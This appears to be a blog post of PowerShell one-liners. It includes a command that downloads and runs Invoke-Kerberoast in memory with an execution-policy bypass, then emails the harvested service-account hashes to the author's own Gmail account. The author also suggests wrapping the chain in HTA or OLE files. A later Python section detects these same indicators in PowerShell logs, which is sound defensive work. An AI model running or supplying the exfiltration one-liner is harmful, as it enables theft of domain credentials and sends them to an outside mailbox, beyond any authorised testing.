PowerShell one liners “that make you go hmmm”

by @myexploit

Just some fun PS one liners.

1. Send an email and attachment using PSv2

First, create a Gmail account (don’t use your everyday one). Then, to be able to access it from a remote source (PS, Outlook and so on), click on Settings, Forwarding and POP/IMAP, and tick “Enable POP for all mail”.

Then copy the script below, paste it into Notepad or whatever you use, and fill in the following sections with your own details: Add-Your-Gmail-Email-Address, Add-Your-Gmail-Password and File-You-Wish-To-Attach.

$emailSmtpServer = "smtp.gmail.com" ; $emailSmtpServerPort = "587" ; $emailSmtpUser = "Add-Your-Gmail-Email-Address" ; $emailSmtpPass = "Add-Your-Gmail-Password" ; $emailMessage = New-Object System.Net.Mail.MailMessage; $emailMessage.From = "Add-Your-Gmail-Email-Address" ; $emailMessage.To.Add( "Add-Your-Gmail-Email-Address" ) ; $emailMessage.Subject = "Testing e-mail" ; $emailMessage.IsBodyHtml = $true; $emailMessage.Body = "test" ; $SMTPClient = New-Object System.Net.Mail.SmtpClient( $emailSmtpServer , $emailSmtpServerPort ); $SMTPClient.EnableSsl = $true ; $SMTPClient.Credentials = New-Object System.Net.NetworkCredential( $emailSmtpUser , $emailSmtpPass ); ; $attachment = "File-You-Wish-To-Attach" ; $emailMessage.Attachments.Add( $attachment ) ; $SMTPClient.Send( $emailMessage )

Then copy and paste the one liner into PS and you should see your email and attachment hit your Gmail inbox.

2. Let’s make this cooler

OK, so the above is cool, but how can you make it, say, more “hmmm”? Easy: combine it with, say, Kerberoasting ;0)

As before, the one liner below requires you to fill in your own details for the following sections: Add-Your-Gmail-Email-Address, Add-Your-Gmail-Password and File-You-Wish-To-Attach. Once complete, it additionally downloads Invoke-Kerberoast.ps1, runs it in memory, and writes the service account hashes to a .txt file in the directory it was run from (OK leet, sorry, the .txt drops to disk). It then creates an email, attaches the output of the hashes and emails it to you; that section is again all in memory.

powershell -ep bypass -c "IEX (New-Object System.Net.WebClient).DownloadString('https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-Kerberoast.ps1') ; Invoke-Kerberoast -OutputFormat HashCat|Select-Object -ExpandProperty hash | out-file -Encoding ASCII kerb-Hash0.txt" ; $emailSmtpServer = "smtp.gmail.com" ; $emailSmtpServerPort = "587" ; $emailSmtpUser = "Add-Your-Gmail-Email-Address" ; $emailSmtpPass = "Add-Your-Gmail-Password" ; $emailMessage = New-Object System.Net.Mail.MailMessage; $emailMessage.From = "Add-Your-Gmail-Email-Address" ; $emailMessage.To.Add( "Add-Your-Gmail-Email-Address" ) ; $emailMessage.Subject = "Testing e-mail" ; $emailMessage.IsBodyHtml = $true; $emailMessage.Body = "test" ; $SMTPClient = New-Object System.Net.Mail.SmtpClient( $emailSmtpServer , $emailSmtpServerPort ); $SMTPClient.EnableSsl = $true ; $SMTPClient.Credentials = New-Object System.Net.NetworkCredential( $emailSmtpUser , $emailSmtpPass ); ; $attachment = "kerb-Hash0.txt" ; $emailMessage.Attachments.Add( $attachment ) ; $SMTPClient.Send( $emailMessage )

The screenshot directly below shows the response after pasting the one liner. Don’t worry about the error; the request functions fine.

The screenshot directly below shows the test inbox after receiving the email sent via PS.

The screenshot directly below shows the attachment in the email sent via PS.

And finally the screenshot directly below shows an extract of the service account hash, sent via PS, sitting in your inbox ;0)

Of course the above could all be added to an HTA, or OLE, enjoy ;0)
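From the defender's side, the one liner in section 2 leaves a recognisable trail when PowerShell Script Block Logging (Event ID 4104) is enabled. The Python below is an added example, not part of the original post: it tags the strings that one liner uses and correlates Kerberoast tooling with an SMTP attachment send per host. The record layout, host names, severity labels and 10-minute window are assumptions, and the sample records are constructed.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Strings taken from the one liners in this post, one pattern per behaviour.
INDICATORS = {
    "download_cradle": re.compile(r"\b(IEX|Invoke-Expression)\b.*\bDownloadString\s*\(", re.I | re.S),
    "kerberoast": re.compile(r"\bInvoke-Kerberoast\b", re.I),
    "smtp_client": re.compile(r"System\.Net\.Mail\.SmtpClient", re.I),
    "smtp_attachment": re.compile(r"\.Attachments\.Add\s*\(", re.I),
    "policy_bypass": re.compile(r"-(ep|exec|executionpolicy)\s+bypass\b", re.I),
}

def tag_event(text):
    """Return the names of all indicators found in one logged script block."""
    return {name for name, rx in INDICATORS.items() if rx.search(text)}

def correlate(events, window=timedelta(minutes=10)):
    """Per host: critical = roast + mail within window, high = roast, medium = mail."""
    by_host = defaultdict(list)
    for ev in events:
        tags = tag_event(ev["text"])
        if tags:
            by_host[ev["host"]].append((datetime.fromisoformat(ev["time"]), tags))
    alerts = {}
    for host, hits in by_host.items():
        roast = [t for t, tags in hits if "kerberoast" in tags]
        mail = [t for t, tags in hits if {"smtp_client", "smtp_attachment"} <= tags]
        if any(abs(m - r) <= window for m in mail for r in roast):
            alerts[host] = "critical"
        elif roast:
            alerts[host] = "high"
        elif mail:
            alerts[host] = "medium"
    return alerts

# Constructed 4104-style records (assumed layout: host, ISO time, script text).
SAMPLE_EVENTS = [
    {"host": "WS01", "time": "2024-01-10T09:00:05", "text":
     "IEX (New-Object System.Net.WebClient).DownloadString('https://example.invalid/x.ps1')"
     " ; Invoke-Kerberoast -OutputFormat HashCat"},
    {"host": "WS01", "time": "2024-01-10T09:00:40", "text":
     "$SMTPClient = New-Object System.Net.Mail.SmtpClient( $s , $p );"
     " $emailMessage.Attachments.Add( $attachment ) ; $SMTPClient.Send( $emailMessage )"},
    {"host": "OPS02", "time": "2024-01-10T03:00:00", "text":
     "$c = New-Object System.Net.Mail.SmtpClient('mail.example.invalid');"
     " $m.Attachments.Add('report.csv'); $c.Send($m)"},
    {"host": "WS03", "time": "2024-01-10T11:00:00", "text": "Get-ChildItem C:\\Temp"},
]
```

On the constructed records, WS01 grades as critical (tooling followed by a mail send 35 seconds later), while OPS02, a scheduled report mailer, only reaches medium and is a candidate for allow-listing.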

More coming soon!